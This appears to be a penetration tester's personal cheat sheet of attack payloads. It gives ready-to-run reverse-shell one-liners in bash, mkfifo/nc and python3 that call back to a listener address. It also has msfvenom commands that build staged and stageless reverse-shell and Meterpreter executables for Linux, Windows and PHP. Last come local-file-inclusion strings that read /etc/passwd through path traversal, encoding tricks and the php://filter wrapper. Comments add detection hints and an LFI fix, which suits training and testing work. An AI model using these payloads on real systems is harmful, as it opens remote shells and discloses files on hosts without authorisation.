
Payloads

Payloads that I use often

Cover photo by https://unsplash.com/@switch_dtp_fotografie

Common

# Reverse-shell one-liners. 1.3.3.7:1337 (and RHOST/RPORT below) stand for the
# listener address; 1.3.3.7 is publicly routable space, not a reserved
# documentation range such as 192.0.2.0/24.

# bash
# Interactive bash with stdout/stderr redirected to a TCP connection and stdin
# duplicated from it. /dev/tcp/HOST/PORT is interpreted by bash itself, so no
# file of that name is opened; the string "/dev/tcp/" in a process command
# line or shell history is a common detection anchor.
bash -i >& /dev/tcp/1.3.3.7/1337 0>&1
# Same command passed as a string to an explicit /bin/bash.
/bin/bash -c "bash -i >& /dev/tcp/1.3.3.7/1337 0>&1"

# mkfifo - sh
# The named pipe /tmp/f carries nc's output back into sh -i, whose
# stdout/stderr feed nc. It leaves a FIFO at a fixed path in /tmp; mkfifo
# followed by an outbound nc is what shows up in process telemetry.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 1.3.3.7 1337 >/tmp/f

# python3 - sh
# Connects a socket to RHOST:RPORT, dup2()s it over fds 0, 1 and 2, then
# pty.spawn("sh") runs sh on a pseudo-terminal. Observable as a python3
# process whose stdin/stdout/stderr are an outbound socket, with an sh child.
export RHOST="10.2.19.132";export RPORT=7777;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

# More on reverse shell generator

Msfvenom

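# msfvenom payload generation. lhost/lport are the handler address the payload
# connects back to; -f selects the output format, written to the redirected file.
# The platform prefix for Windows payloads is windows/.

# Stageless
# Stageless names join payload and transport with an underscore
# (shell_reverse_tcp): the complete payload is inside the generated file.
msfvenom -p linux/x64/shell_reverse_tcp lhost=1.3.3.7 lport=1337 -f elf > shell.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=1.3.3.7 lport=1337 -f elf > meter.elf
msfvenom -p windows/x64/shell_reverse_tcp lhost=1.3.3.7 lport=1337 -f exe > shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=1.3.3.7 lport=1337 -f exe > meter.exe

# Staged
# Staged names use a slash (shell/reverse_tcp): the file holds only a stager
# that pulls the remaining stage from the handler at lhost:lport, so the stage
# transfer is visible on the network.
# NOTE: these commands write to the same output filenames as the stageless
# ones above and overwrite them if both sets are run in one directory.
msfvenom -p linux/x64/shell/reverse_tcp lhost=1.3.3.7 lport=1337 -f elf > shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=1.3.3.7 lport=1337 -f elf > meter.elf
msfvenom -p windows/x64/shell/reverse_tcp lhost=1.3.3.7 lport=1337 -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=1.3.3.7 lport=1337 -f exe > meter.exe

# Web
# Stageless PHP Meterpreter emitted as raw PHP source.
msfvenom -p php/meterpreter_reverse_tcp lhost=1.3.3.7 lport=1337 -f raw > meter.php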

LFI

# Test values for a parameter that ends up in a file include/read.
# Each one probes a different gap in path validation. The fix is the same for all:
# map user input to fixed identifiers, or resolve the final path and require it
# to sit under an allowlisted base directory, validating after a single decode.
/etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd%00 # NUL-byte truncation of an appended suffix; PHP rejects paths containing NUL bytes since 5.3.4, so only older versions are affected
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd # URL-encoded once; gets past filters that match the literal "../" before decoding
%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd # URL-encoded twice; only effective when a later layer decodes a second time after validation
php://filter/convert.base64-encode/resource=PAYLOAD # php:// stream wrapper; the included file is returned base64-encoded, disclosing source instead of executing it